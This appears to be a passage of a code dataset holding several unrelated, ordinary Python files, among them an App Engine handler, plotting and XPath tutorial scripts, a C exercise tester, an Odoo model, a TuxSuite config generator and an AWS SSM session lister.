","sub_path":"Presenter_Program/presentwords.py","file_name":"presentwords.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577477296","text":"#!/usr/bin/env python\n\nfrom conference import ConferenceApi\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import mail\nimport webapp2\n\n\"\"\"main.py\nDefines handlers for long running or asynchronous task performed by the cron.\n\"\"\"\n\n\nclass SetAnnouncementHandler(webapp2.RequestHandler):\n def get(self):\n \"\"\"\n Set Announcement in Memcache.\n \"\"\"\n ConferenceApi._cache_announcement()\n\n\nclass SendConfirmationEmailHandler(webapp2.RequestHandler):\n def post(self):\n \"\"\"\n Send email confirming Conference creation.\n \"\"\"\n mail.send_mail(\n 'noreply@%s.appspotmail.com' % (\n app_identity.get_application_id()), # from\n self.request.get('email'), # to\n 'You created a new Conference!', # subject\n 'Hi, you have created a following ' # body\n 'conference:\\r\\n\\r\\n%s' % self.request.get('conferenceInfo')\n )\n\n\napp = webapp2.WSGIApplication([\n ('/crons/set_announcement', SetAnnouncementHandler),\n ('/tasks/send_confirmation_email', SendConfirmationEmailHandler),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247308260","text":"from matplotlib import pyplot as plt\nimport seaborn as sns\nimport matplotlib.patches as mpatches\nimport numpy as np\nfrom scipy import stats\nimport pandas as pd\nfrom AA_Index_Dictionary import get_scales\nfrom aaData.Original_Sequences import import_excel_seq as get_sequences\nfrom aaData.Original_Sequences import get_average_aa_distribution as av_destrib\nfrom aaData.Original_Sequences import get_average_length_and_count as av_length\nfrom aaData.Original_Sequences import AA_Group\nfrom xOld.Statistics_AUC import discrimination_via_AUC\nfrom abProcess.Profiles_Original_Sequences import profile_dictionary\nfrom acStatistics.Statistics_KS import get_value_count\nfrom 
acStatistics.Statistics_Significant_Scales import scale_filter\nfrom Configfile import *\nfrom Environment.file_parser import file_name\n\n# Basic Configurations\nsns.set(color_codes=True)\nall_scales_df, aa_val = get_scales(file_aa, file_list, AA_code)\noutput_folder = results + \"adPlotting_Results/\"\n# description = AA_Group.aa_destribution_description(self, file)\n\n# I. General information for plotting\nsequence_value = av_length(file_sub, file_non_sub)\n## Get dictionary of colors (Taylor classes)\npolar_neutral = {aa: \"green\" for aa in ['S', 'T', 'C', 'Q', 'N', 'Y']}\nnonpolar = {aa: \"orange\" for aa in ['P', 'M', 'A', 'L', 'I', 'V', 'W', 'F', 'G']}\nacid = {aa: \"red\" for aa in ['E', 'D']}\nbasic = {aa: \"blue\" for aa in ['H', 'R', 'K']}\nlist_dict = [nonpolar, acid, basic]\ncolor_dict = AA_Group.merge_dicts(polar_neutral, list_dict)\n## Get dictionary of aa classes\nclasses = AA_Group.aa_classes\n## Get significant scales\n\n\n# II. Figure Aesthetics\nsns.set_palette(\"bright\") # ?\n## Seaborn styles\nsns.set(color_codes=True)\nsns.set_style(\"whitegrid\")\n\n\n# 1. Plotting of amino acid distribution\ndef aa_destribution_barplot(file):\n \"\"\"Plotting of amino acid distribution\n in one dataset (e.g. all Substrates for Gammasecretase)\"\"\"\n\n # 1. Data\n aa_distrib_tmd, aa_distrib_aa = av_destrib(file)\n values_percent = [i * 100 for i in aa_distrib_aa.values]\n # 2. Categorical Plot (Barplot)\n x = aa_distrib_aa.index\n y = values_percent\n ax = sns.barplot(x=x, y=y, palette=color_dict)\n # 3. Modification of Plot\n # 3.1 Axisgrid Object\n sns.despine()\n sns.set_context(\"paper\")\n plt.ylabel(\"Occurrence of amino acid [%]\")\n plt.xlabel(\"Amino acid\")\n ax.set_ylim([0, 20])\n # 3.2 Plot\n ## Get title\n name = file_name(file)\n title = \"Distribution of amino acids in \" + name\n plt.title(title, fontsize=10, fontweight='bold')\n ## Get legend (manually via mpatches)\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles, labels)\n nonpolar = mpatches.Patch(color='orange', label='Nonpolar')\n polar = mpatches.Patch(color='green', label='Polar')\n basic = mpatches.Patch(color='blue', label='Basic')\n acid = mpatches.Patch(color='red', label='Acid')\n plt.legend(handles=[nonpolar, polar, basic, acid],\n loc='upper right',\n fancybox=True, framealpha=1, frameon=True,\n title='AA Classification (by Taylor)',\n )\n # 4. Show Plot\n plt.savefig(output_folder + 'aaDistribution_in_' + name + '.png')\n plt.close()\n\n# 2. Plotting of Norm-Distribution (?)\ndef auc_distribution_displot(file_sub, file_non_sub):\n \"\"\"Plotting of distribution of auc \"\"\"\n AUC_df = discrimination_via_AUC(file_sub, file_non_sub)\n ratio_AUC = pd.Series(AUC_df) # build a Series from the computed AUC results for the distplot\n sns.distplot(ratio_AUC, rug=True, fit=stats.norm)\n plt.show()\n\n\n# Helper function for title\ndef split_title(a):\n if len(a) > 80:\n split = a[0:75]\n middle = a[75:].split(' ', 1)\n first = split + middle[0]\n last = middle[1]\n if '(' not in last and ')' in last:\n title = first + last\n else:\n title = first + '\\n' + last\n else:\n title = a\n return title\n\n\n# 3. 
Plotting AUC Profiles for top_scales\ndef profile_plot(file_sub, file_non_sub):\n \"\"\"Plot of aa_index profiles of sequences\n a) In: profile_dictionary\n b) Out: Plots of profiles\"\"\"\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n id_sequence_sub, id_name_sub, df_sequence_sub = get_sequences(file_sub)\n id_sequence_non_sub, id_name_non_sub, df_sequence_non_sub = get_sequences(file_non_sub)\n sequence_value_sub = profile_dictionary(file_sub)\n sequence_value_non_sub = profile_dictionary(file_non_sub)\n sub_list = ['Notch2', 'CD44', 'BCMA']\n non_sub_list = ['DAP-12', 'NPR-A', 'GPA']\n for scale_id in top_scales: # sorted(sequence_value):\n # Create path and dictionary for top scales\n output = output_folder + 'AA_Profiles'\n os.makedirs(output, exist_ok=True)\n # Create subplots\n fig, ax = plt.subplots(2, 3, facecolor='w', edgecolor='k', sharey=True)\n\n # Create plots for substrates (new directory for non-substrate)\n i = 0\n for seq_id in sequence_value_sub[scale_id]:\n if id_name_sub[seq_id] in sub_list:\n y = sequence_value_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_sub[scale_id][seq_id][\"Sequence\"]\n ax[0, i].plot(x, y)\n ax[0, i].set_xticks(x)\n ax[0, i].set_xticklabels(x_ticks_labels, fontsize=6.5)\n ax[0, i].set_title(id_name_sub[seq_id],\n loc='center', fontsize=10,\n fontweight=\"bold\", color='blue')\n ax[0, i].grid(axis='x')\n i += 1\n else:\n pass\n j = 0\n for seq_id in sequence_value_non_sub[scale_id]:\n if id_name_non_sub[seq_id] in non_sub_list:\n y = sequence_value_non_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_non_sub[scale_id][seq_id][\"Sequence\"]\n ax[1, j].plot(x, y)\n ax[1, j].set_xticks(x)\n ax[1, j].set_xticklabels(x_ticks_labels, fontsize=6.5)\n ax[1, j].set_title(id_name_non_sub[seq_id],\n loc='center', fontsize=10,\n fontweight=\"bold\", color='red')\n ax[1, j].grid(axis='x')\n j += 1\n else:\n pass\n\n # Adjust subplot size\n fig.subplots_adjust(hspace=.50, wspace=.05, left=0.1, right=0.9, top=0.85)\n fig.set_size_inches(8, 4)\n # Get title (if too long)\n title_str = 'AA-Profile for ' + str(aa_des[scale_id])[0].lower() + str(aa_des[scale_id])[1:]\n title = split_title(title_str) # Split title helper function\n if '\\n' in title:\n fig.suptitle(title, fontsize=7, fontweight='bold')\n else:\n fig.suptitle(title, fontsize=8, fontweight='bold')\n # Save plot\n plt.savefig(output + '/' + str(scale_id).strip('H ') + '.png')\n plt.close()\n\n\n# 4. 
Plotting Value count (KS-module)\ndef plotting_value_count(file_sub, file_non_sub, significant_scales):\n \"\"\"Plotting of value count distribution of\n significant scale as (a) barplot, (b) kde\"\"\"\n output = output_folder + \"/Value_count\"\n os.makedirs(output, exist_ok=True) # make sure the target folder exists before saving plots\n count_sub_dict, count_non_sub_dict, count_df_dict = get_value_count(file_sub, file_non_sub)\n # Plot each significant scale\n for scale_id in significant_scales:\n # Melted for barplot\n fig, ax = plt.subplots()\n sns.set_context('paper')\n melted = pd.melt(count_df_dict[scale_id], ['Value'], var_name='Sub/Non-Sub',\n value_name='Count') # Use dictionary of count dataframes!\n # Plotting\n ax = sns.barplot(x='Value', y='Count', hue='Sub/Non-Sub', data=melted)\n plt.setp(ax.get_xticklabels(), rotation=90)\n plt.ylabel(\"Count [%]\", fontsize=9)\n plt.xlabel('Value', fontsize=9)\n fig.subplots_adjust(bottom=0.15, top=0.85)\n # Get title\n title_str = 'Value count for ' + str(aa_des[scale_id])[0].lower() + str(aa_des[scale_id])[1:]\n title = split_title(title_str) # Split title helper function\n if '\\n' in title:\n plt.title(title, fontsize=8, fontweight='bold')\n elif len(title) > 75:\n plt.title(title, fontsize=8, fontweight='bold')\n else:\n plt.title(title, fontsize=10, fontweight='bold')\n # Save plot\n plt.savefig(output + '/' + str(scale_id).strip('H ') + '_Value_count.png')\n plt.close()\n # sns.jointplot(x=\"Sub\", y=\"Non_sub\", data=count_df_dict[scale_id]) # Use dictionary of count dataframes!\n # plt.savefig(output_folder + str(scale_id) + '_joinplot.png')\n # plt.close()\n\ndef main(file_sub, file_non_sub):\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n # a1 = aa_destribution_barplot(file_sub)\n # a2 = aa_destribution_barplot(file_non_sub)\n # b = auc_distribution_displot(file_sub, file_non_sub)\n #profile_plot(file_sub, file_non_sub)\n plotting_value_count(file_sub, file_non_sub, top_scales)\n\nif __name__ == \"__main__\":\n main(file_sub, file_non_sub)\n\n# Supplement\n# 3. 
Plotting AUC Profiles for top_scales\n\"\"\"\ndef profile_plot_total(file_sub, file_non_sub):\n Plot of aa_index profiles of sequences\n a) In: profile_dictionary\n b) Out: Plots of profiles\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n id_sequence_sub, id_name_sub, df_sequence_sub = get_sequences(file_sub)\n id_sequence_non_sub, id_name_non_sub, df_sequence_non_sub = get_sequences(file_non_sub)\n sequence_value_sub = profile_dictionary(file_sub)\n sequence_value_non_sub = profile_dictionary(file_non_sub)\n\n for scale_id in top_scales: # sorted(sequence_value):\n # Create path and dictionary for top scales\n output_sub = output_folder + str(aa_des[scale_id])\n output_non_sub = output_folder + str(aa_des[scale_id]) + '/Non-Substrate'\n os.makedirs(output_sub, exist_ok=True)\n os.makedirs(output_non_sub, exist_ok=True)\n # Create plots for substrates (new directory for non-substrate)\n for i, seq_id in enumerate(sequence_value_sub[scale_id]):\n y = sequence_value_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_sub[scale_id][seq_id][\"Sequence\"]\n plt.plot(x, y)\n plt.xticks(x, x_ticks_labels)\n plt.title(aa_des[scale_id] + \"\\n\" + id_name_sub[seq_id])\n plt.savefig(output_sub + \"/\" + str(scale_id) + \"_\" + str(id_name_sub[seq_id]))\n plt.close(fig)\n for j, seq_id in enumerate(sequence_value_non_sub[scale_id]):\n y = sequence_value_non_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_non_sub[scale_id][seq_id][\"Sequence\"]\n fig, ax = plt.subplots()\n plt.plot(x, y)\n plt.xticks(x, x_ticks_labels)\n plt.title(aa_des[scale_id] + \"\\n\" + id_name_non_sub[seq_id])\n plt.savefig(output_non_sub + \"/\" + str(scale_id) + \"_\" + str(id_name_non_sub[seq_id]))\n plt.close(fig)\n\"\"\"\n","sub_path":"xOld/Plotting.py","file_name":"Plotting.py","file_ext":"py","file_size_in_byte":11307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590017695","text":"#!/usr/bin/env python3\n#git:alexmayor-21\n\nimport os\nimport re\nimport shlex\nimport subprocess\nimport sys\n\nclass Tester(object):\n def __init__(self):\n self.exercises = self.get_exercises()\n \n def get_exercises(self):\n root = os.path.abspath('..')\n cd = os.path.abspath('.')\n exercises = list()\n for direc in os.listdir(root):\n if not re.match(\"ex[0-9]+\", direc):\n continue\n ex = Exercise()\n ex.name = direc\n ex.dir = os.path.join(root, direc)\n ex.bin = os.path.join(cd, 'someweirdname')\n ex.src = list()\n for file in os.listdir(ex.dir):\n if file.endswith('.c'):\n ex.src.append(os.path.join(ex.dir, file))\n ex.cd = cd\n testfile = os.path.join(cd, direc + \".test\")\n if not os.path.isfile(testfile):\n print (\"Missing tests for %s\\n\" % ex, end=\"\")\n continue\n ex.testfile = testfile\n exercises.append(ex)\n return (exercises)\n \n def run(self):\n for ex in self.exercises:\n ex.run_tests(verbose=False)\n\nclass Exercise(object):\n \n def run_tests(self, verbose=False):\n self.process_testfile()\n print (\"********** %s **********\\n\" % self.name, end=\"\")\n self.compilation()\n for i, test in enumerate(self.tests, 1):\n print (\"===== test %i =====\\n\" % i, end=\"\")\n self.test_io(test, verbose=False)\n self.cleanup()\n \n def process_testfile(self):\n PreP = TestFilePreP(self.testfile)\n if os.path.join(self.dir, 'main.c') not in self.src:\n main_path = os.path.join(self.cd, 'main.c') \n self.src.append(main_path)\n 
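# materialise the main.c section parsed from the .test file, so compilation() can build it alongside the exercise sources\n 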
PreP.write_main(main_path)\n self.tests = PreP.get_tests()\n \n def compilation(self):\n call = [\"gcc\", \"-Werror\", \"-Wall\", \"-Wextra\"]\n call += self.src\n call += [\"-o\", self.bin]\n subprocess.check_output(call)\n \n def test_io(self, test, verbose=False):\n if test.message and verbose:\n print (test.message)\n call = [self.bin]\n call += test.input\n print (\" \".join(shlex.quote(s) for s in call) + '\\n', end=\"\")\n self.output = subprocess.Popen(call, stdout=subprocess.PIPE)\n self.output = self.output.stdout.readlines()\n self.output = \"\".join(line.decode() for line in self.output)\n if self.output == test.check:\n print (\"ok\\n\\n\", end=\"\")\n else:\n print (\"FAILED!\\n\")\n print (\"\\nget output:\\n%s\" % self.output.replace('\\n', '$\\n'), end=\"\")\n print (\"\\ncorrect output:\\n%s\" % test.check.replace('\\n', '$\\n'), end=\"\")\n sys.exit(1)\n \n def cleanup(self):\n main_created = os.path.join(self.cd, 'main.c')\n if os.path.isfile(main_created):\n os.remove(main_created)\n os.remove(self.bin)\n\nclass Test(object):\n def __init__(self):\n self.message = str()\n self.input = list()\n self.check = str()\n self.mode = None\n \n def add(self, line):\n if line.startswith('#'):\n self.message += line\n elif line.startswith('<'):\n self.mode = 'input'\n elif line.startswith('>'):\n self.mode = 'check'\n else:\n if self.mode == 'input':\n self.input += shlex.split(line)\n if self.mode == 'check':\n self.check += line\n\nclass TestFilePreP(object):\n def __init__(self, path):\n with open(path, 'r') as file:\n self.content = file.readlines()\n self.index = 0\n self.process_main()\n \n def process_main(self):\n self.skip_empty()\n if \"===== main.c =====\" in self.content[self.index]:\n self.index += 1\n self.main_body = list()\n while \"===== tests =====\" not in self.content[self.index]:\n self.main_body.append(self.content[self.index]) # collect the current line of the embedded main.c\n self.index += 1\n self.index += 1\n\n def write_main(self, name=\"main.c\"):\n with open(name, 'w') as file:\n for line in self.main_body:\n file.write(line)\n self.main = name\n \n def skip_empty(self):\n while self.content[self.index].isspace():\n self.index += 1\n \n def get_tests(self):\n self.skip_empty()\n tests = list()\n test = Test()\n while self.index < len(self.content):\n line = self.content[self.index]\n if not line.isspace():\n if line.strip().endswith('$'):\n line = line.strip()[:-1]\n test.add(line)\n self.index += 1\n else:\n tests.append(test)\n self.skip_empty()\n test = Test()\n if self.index == len(self.content) - 1:\n tests.append(test)\n return tests\n\n\nif __name__ == \"__main__\":\n\tmyTester = Tester()\n\tmyTester.run()\n","sub_path":"42-checker.py","file_name":"42-checker.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"559600297","text":"import random\n\nclass Game:\n\n board_size = 10\n\n def __init__(self):\n self.ship_lengths = [5,4,3,3,2]\n self.remaining_hits = sum(self.ship_lengths)\n self.board = [[0] * self.board_size for i in xrange(self.board_size)]\n for length in self.ship_lengths:\n while True:\n vertical = (random.random() > 0.5)\n x_coord = random.randint(0,self.board_size - 1 if vertical else self.board_size-1-length) #coords of upper right square\n y_coord = random.randint(0,self.board_size-1-length if vertical else self.board_size-1)\n if vertical:\n if y_coord + length <= self.board_size and all(self.board[y_coord + k][x_coord] == 0 for k in xrange(length)):\n for k in xrange(length):\n self.board[y_coord 
+ k][x_coord] = 1\n break\n else:\n if x_coord + length <= self.board_size and all( self.board[y_coord][x_coord + k] == 0 for k in xrange(length)):\n for k in xrange(length):\n self.board[y_coord][x_coord + k] = 1\n break\n\n def play(self, x_coord, y_coord):\n if self.board[y_coord][x_coord] == 1:\n self.remaining_hits -=1\n if self.remaining_hits == 0:\n return -1\n return 1\n return 0\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"142231951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nUse XPath to locate one or more nodes, then call the matching methods to get their content or attributes.\nCommon rules:\n nodename: selects all child nodes of the named node\n / : selects direct children from the current node\n // : selects descendants from the current node\n . : selects the current node\n .. : selects the parent of the current node\n @ : selects attributes and returns a list of attribute values\n\nOperators\n and or mod +-*/ div = != > >=\n\n\"\"\"\n\nfrom lxml import etree\n\n\ntext = \"\"\"\n<div>\n <ul>\n <li class=\"item-0\"><a href=\"link1.html\">first item</a></li>\n <li class=\"item-1\"><a href=\"link2.html\">second item</a></li>\n <li class=\"item-inactive\"><a href=\"link3.html\">third item</a></li>\n <li class=\"item-1\"><a href=\"link4.html\">fourth item</a></li>\n <li class=\"item-0\"><a href=\"link5.html\">fifth item</a>\n </ul>\n</div>\n\"\"\"\n\n\ndef main():\n # Build the XPath parsing object\n html = etree.HTML(text)\n # Auto-repairs the HTML code, completing any missing tags (note the unclosed li above)\n result = etree.tostring(html)\n print(result.decode('utf-8'))\n\n # Read an HTML file from disk and parse it\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n result = etree.tostring(html)\n print(result.decode('utf-8'))\n\n\ndef nodes():\n # Get all nodes\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Call the xpath() method on the parsed object\n result = html.xpath('//*')\n print(result)\n\n # Get a specific node type\n result = html.xpath('//li')\n print(result)\n\n\ndef subnode():\n # Get child nodes\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Get all direct a children of every li tag\n result = html.xpath('//li/a')\n print(result)\n\n # Get descendant nodes\n result = html.xpath('//ul//a')\n print(result)\n\n\ndef prenode():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # ../ gets the parent node\n result = html.xpath('//a[@href=\"link4.html\"]/../@class')\n print(result)\n\n # parent:: gets the parent node\n result = html.xpath('//a[@href=\"link4.html\"]/parent::*/@class')\n print(result)\n\n\ndef attribute():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Filter tags by attribute\n result = html.xpath('//li[@class=\"item-0\"]')\n print(result)\n\n\ndef text():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Returns only the newline left by the HTML repair, not the text of the inner a tag\n result = html.xpath('//li[@class=\"item-0\"]/text()')\n print(result)\n # Returns the text of the li and a tags (all descendants), repair newlines included\n result = html.xpath('//li[@class=\"item-0\"]//text()')\n print(result)\n # Returns the text of the a tag: the expected result\n result = html.xpath('//li[@class=\"item-0\"]/a/text()')\n print(result)\n\n\ndef attr():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Get attribute values under the given tag\n result = html.xpath('//li/a/@href')\n print(result)\n\n # Matching a multi-valued attribute with the contains(@attr, value) function\n text = \"\"\"\n <li class=\"li li-first\"><a href=\"link.html\">first item</a></li>\n \"\"\"\n html = etree.HTML(text)\n result = html.xpath('//li[contains(@class, \"li\")]/a/text()')\n print(result)\n\n # Matching multiple attributes joined with and: contains(@attr, value) and @attr2=value2\n text = \"\"\"\n <li class=\"li li-first\" name=\"item\"><a href=\"link.html\">first item</a></li>\n \"\"\"\n html = etree.HTML(text)\n result = html.xpath('//li[contains(@class, \"li\") and @name=\"item\"]/a/text()')\n print(result)\n\n\ndef sequence():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # Select target nodes by index, starting from 1\n # last() takes the last one\n # last()-1 takes the second to last\n # position()<5 takes the first four\n result = html.xpath('//li[position()<5]/a/text()')\n print(result)\n\n\ndef axis():\n text = \"\"\"\n <div>\n <ul>\n <li class=\"item-0\"><a href=\"link1.html\"><span>first item</span></a></li>\n <li class=\"item-1\"><a href=\"link2.html\">second item</a></li>\n <li class=\"item-inactive\"><a href=\"link3.html\">third item</a></li>\n <li class=\"item-1\"><a href=\"link4.html\">fourth item</a></li>\n <li class=\"item-0\"><a href=\"link5.html\">fifth item</a></li>\n </ul>\n </div>\n \"\"\"\n html = etree.HTML(text)\n\n # ancestor:: gets all ancestor nodes; * means any node, ul names a specific one\n result1 = html.xpath('//li[1]/ancestor::*')\n result2 = html.xpath('//li[1]/ancestor::ul')\n print(result1, ' + ', result2)\n\n # attribute:: gets all attribute values of a node, or one named attribute\n result1 = html.xpath('//li[1]/attribute::*')\n result2 = html.xpath('//li[1]/attribute::id')\n print(result1, ' + ', result2)\n\n # child:: gets all direct child nodes; qualifiers may be added\n result1 = html.xpath('//li[1]/child::a[@href=\"link1.html\"]//text()')\n result2 = html.xpath('//li[1]/child::*')\n print(result1, ' + ', result2)\n\n # descendant:: gets all descendant nodes; qualifiers may be added\n result = html.xpath('//li[1]/descendant::span')\n print(result)\n\n # following::* gets all nodes after the current node (its own children excluded, theirs included)\n result = html.xpath('//li[1]/following::*[2]/text()')\n print(result)\n\n # following-sibling::* gets all siblings after the current node\n result = html.xpath('//li[1]/following-sibling::*[1]//text()')\n print(result)\n\n\nif __name__ == \"__main__\":\n # main()\n\n # all nodes\n # nodes()\n\n # child nodes\n # subnode()\n\n # parent nodes\n # prenode()\n\n # attribute matching\n # attribute()\n\n # get text values\n # text()\n\n # get attribute values\n # attr()\n\n # select nodes by position\n # sequence()\n\n # axes: get children, siblings, parents and ancestors\n axis()\n","sub_path":"modules/xpath_.py","file_name":"xpath_.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"228257722","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models,fields,api\n\nclass StockPickingInherit(models.Model):\n _inherit = 'stock.picking'\n\n emp_request_id = fields.Many2one('employee.request', 'Employee Request')\n partner_id = fields.Many2one('res.partner')\n type = fields.Selection([\n ('m', 'Publications'),\n ('fm', 'foodstuffs'),\n ('s', 'Watering'),\n ('a', 'Origins'),\n ('other', 'Other')\n ])\n\n @api.multi\n def write(self, vals):\n return_id = super(StockPickingInherit, self).write(vals)\n total_transfer = 0\n for rec in self:\n if len(rec.emp_request_id) > 0:\n employee_request = self.env['employee.request'].browse(rec.emp_request_id.id)\n for transfer in employee_request.transfer_ids:\n if transfer.state == 'done':\n total_transfer += 1\n if total_transfer == len(employee_request.transfer_ids):\n employee_request.write({'state': 'final_done'})\n\n return return_id\n\nclass StockMoveInherit(models.Model):\n _inherit = 'stock.move'\n\n partner_id = fields.Many2one('res.partner')\n","sub_path":"isky_employee_request/models/stock_picking_inherit.py","file_name":"stock_picking_inherit.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"288204798","text":"#!/usr/bin/env python3\nimport argparse\nimport pathlib\nimport sys\nimport yaml\n\n\n# Aliases make this YAML unreadable\n# https://ttl255.com/yaml-anchors-and-aliases-and-how-to-disable-them/\nclass NoAliasDumper(yaml.SafeDumper):\n def ignore_aliases(self, data):\n return True\n\n\ndef parse_args(trees):\n parser = argparse.ArgumentParser(description=\"Generate TuxSuite YML.\")\n parser.add_argument(\"tree\",\n help=\"The git repo and ref to filter in.\",\n 
choices=[tree[\"name\"] for tree in trees])\n return parser.parse_args()\n\n\ndef get_config():\n # Trusted input.\n # https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation\n return yaml.load(sys.stdin, Loader=yaml.FullLoader)\n\n\ndef get_repo_ref(config, tree_name):\n for tree in config[\"trees\"]:\n if tree[\"name\"] == tree_name:\n return tree[\"git_repo\"], tree[\"git_ref\"]\n\n\ndef emit_tuxsuite_yml(config, tree):\n print(\"# DO NOT MODIFY MANUALLY!\")\n print(\"# This file has been autogenerated by invoking:\")\n print(\n \"# $ ./generate_tuxsuite.py < generator.yml {} > tuxsuite/{}.tux.yml\".\n format(tree, tree))\n print(\"# Invoke tuxsuite via:\")\n print(\n \"# $ tuxsuite build-set --set-name defconfigs --json-out builds.json --tux-config tuxsuite/{}.tux.yml\"\n .format(tree))\n tuxsuite_buildset = {\n 'sets': [\n {\n 'name': 'defconfigs',\n 'builds': [],\n }\n ]\n } # yapf: disable\n repo, ref = get_repo_ref(config, tree)\n ci_folder = pathlib.Path(__file__).resolve().parent\n with open(ci_folder.joinpath(\"LLVM_TOT_VERSION\")) as f:\n max_version = int(f.read())\n defconfigs = []\n distribution_configs = []\n allconfigs = []\n for build in config[\"builds\"]:\n if build[\"git_repo\"] == repo and build[\"git_ref\"] == ref:\n arch = build[\"ARCH\"] if \"ARCH\" in build else \"x86_64\"\n toolchain = \"clang-\"\n toolchain += \"nightly\" if build[\n \"llvm_version\"] == max_version else str(build[\"llvm_version\"])\n\n current_build = {\n \"git_repo\": build[\"git_repo\"],\n \"git_ref\": build[\"git_ref\"],\n \"target_arch\": arch,\n \"toolchain\": toolchain,\n \"kconfig\": build[\"config\"],\n \"targets\": build[\"targets\"]\n }\n if \"kernel_image\" in build:\n current_build.update({\"kernel_image\": build[\"kernel_image\"]})\n if \"make_variables\" in build:\n current_build.update(\n {\"make_variables\": build[\"make_variables\"]})\n\n if \"defconfig\" in str(build[\"config\"]):\n defconfigs.append(current_build)\n elif \"https://\" in str(build[\"config\"]):\n distribution_configs.append(current_build)\n else:\n allconfigs.append(current_build)\n\n tuxsuite_buildset[\"sets\"][0][\"builds\"] = defconfigs\n if distribution_configs:\n tuxsuite_buildset[\"sets\"] += [{\n \"name\": \"distribution_configs\",\n \"builds\": distribution_configs\n }]\n if allconfigs:\n tuxsuite_buildset[\"sets\"] += [{\n \"name\": \"allconfigs\",\n \"builds\": allconfigs\n }]\n print(\n yaml.dump(tuxsuite_buildset,\n Dumper=NoAliasDumper,\n width=1000,\n sort_keys=False))\n\n\nif __name__ == \"__main__\":\n # The list of valid trees come from the input, so we parse the input, then\n # check command line flags.\n config = get_config()\n args = parse_args(config[\"trees\"])\n emit_tuxsuite_yml(config, args.tree)\n","sub_path":"generate_tuxsuite.py","file_name":"generate_tuxsuite.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499739049","text":"import os\nimport boto3\nimport base64\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\n\ndef get_logger():\n #return: logger object with logging level set\n\n import logging\n\n #Get logging level from environment variable\n LOGLEVEL = os.environ.get('LOGGING_LEVEL', 'INFO').upper()\n level = logging.getLevelName(LOGLEVEL)\n\n logger = logging.getLogger()\n logger.setLevel(level)\n #Mute verbose boto3 and request library logging\n logging.getLogger('boto3').setLevel(logging.CRITICAL)\n 
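# botocore and urllib3 are just as chatty once API calls start flowing, so they are pinned to CRITICAL too; the same pattern extends to any other noisy dependency, e.g. logging.getLogger('s3transfer')\n 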
logging.getLogger('botocore').setLevel(logging.CRITICAL)\n logging.getLogger('urllib3').setLevel(logging.CRITICAL)\n\n return logger\n\ndef list_active_sessions(session):\n #param session: boto3 session object\n #return: list of active ssm sessions\n\n ssm_client = session.client('ssm')\n paginator = ssm_client.get_paginator('describe_sessions')\n response_iterator = paginator.paginate(\n State = 'Active'\n )\n ssm_sessions = []\n for page in response_iterator:\n for session in page['Sessions']:\n ssm_sessions.append(session['SessionId'])\n\n return ssm_sessions","sub_path":"src/revoke_session/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"535991941","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def maxAncestorDiff(self, root: TreeNode) -> int:\n self.ret = 0\n self.traverse(root)\n return self.ret\n \n def traverse(self, root):\n from_left = self.traverse(root.left) if getattr(root.left, 'val', None) is not None else [root.val, root.val]\n from_right = self.traverse(root.right) if getattr(root.right, 'val', None) is not None else [root.val, root.val]\n \n m = min(root.val, from_left[0], from_left[1], from_right[0], from_right[1])\n M = max(root.val, from_left[0], from_left[1], from_right[0], from_right[1])\n \n self.ret = max(self.ret, abs(m - root.val), abs(M - root.val))\n return [m, M]\n","sub_path":"1026_maximum-difference-between-node-and-ancestor.py","file_name":"1026_maximum-difference-between-node-and-ancestor.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
